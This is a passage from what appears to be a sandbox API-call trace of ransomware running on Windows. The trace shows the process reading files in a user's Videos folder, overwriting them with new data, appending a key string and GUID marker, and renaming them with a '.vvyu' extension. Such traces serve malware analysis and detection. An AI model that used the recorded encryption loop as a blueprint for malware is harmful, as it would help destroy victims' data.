(hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.551] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.551] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.551] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb800) returned 0x2d4f778 [0197.551] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d2c8 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d310 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.552] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a408 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.555] GetCurrentThreadId () returned 0x264 [0197.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bca0 [0197.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.556] GetCurrentThreadId () returned 0x264 [0197.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d310 | out: hHeap=0x6a0000) returned 1 [0197.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.568] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0xb7f4, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0xb7f4, lpOverlapped=0x0) returned 1 [0197.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.569] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xb7f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.569] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.570] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.571] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.571] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.571] CloseHandle (hObject=0x52c) returned 1 [0197.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0197.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.573] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\irICFx-m5Bn.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\iricfx-m5bn.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\irICFx-m5Bn.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\iricfx-m5bn.avi.vvyu")) returned 1 [0197.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.576] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.580] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa390ac40, ftCreationTime.dwHighDateTime=0x1d89fc9, ftLastAccessTime.dwLowDateTime=0x6b2e7f20, ftLastAccessTime.dwHighDateTime=0x1d8a2d6, ftLastWriteTime.dwLowDateTime=0x6b2e7f20, ftLastWriteTime.dwHighDateTime=0x1d8a2d6, nFileSizeHigh=0x0, nFileSizeLow=0xdb59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WdFQwzg9SEi1QiIC.mkv", cAlternateFileName="WDFQWZ~1.MKV")) returned 1 [0197.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.580] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\WdFQwzg9SEi1QiIC.mkv") returned=".mkv" [0197.580] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\WdFQwzg9SEi1QiIC.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\wdfqwzg9sei1qiic.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.581] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=56153) returned 1 [0197.581] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.585] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xdb33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.585] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.587] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.587] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xdb59, lpOverlapped=0x0) returned 1 [0197.587] lstrlenA (lpString="-----BEGIN PUBLIC 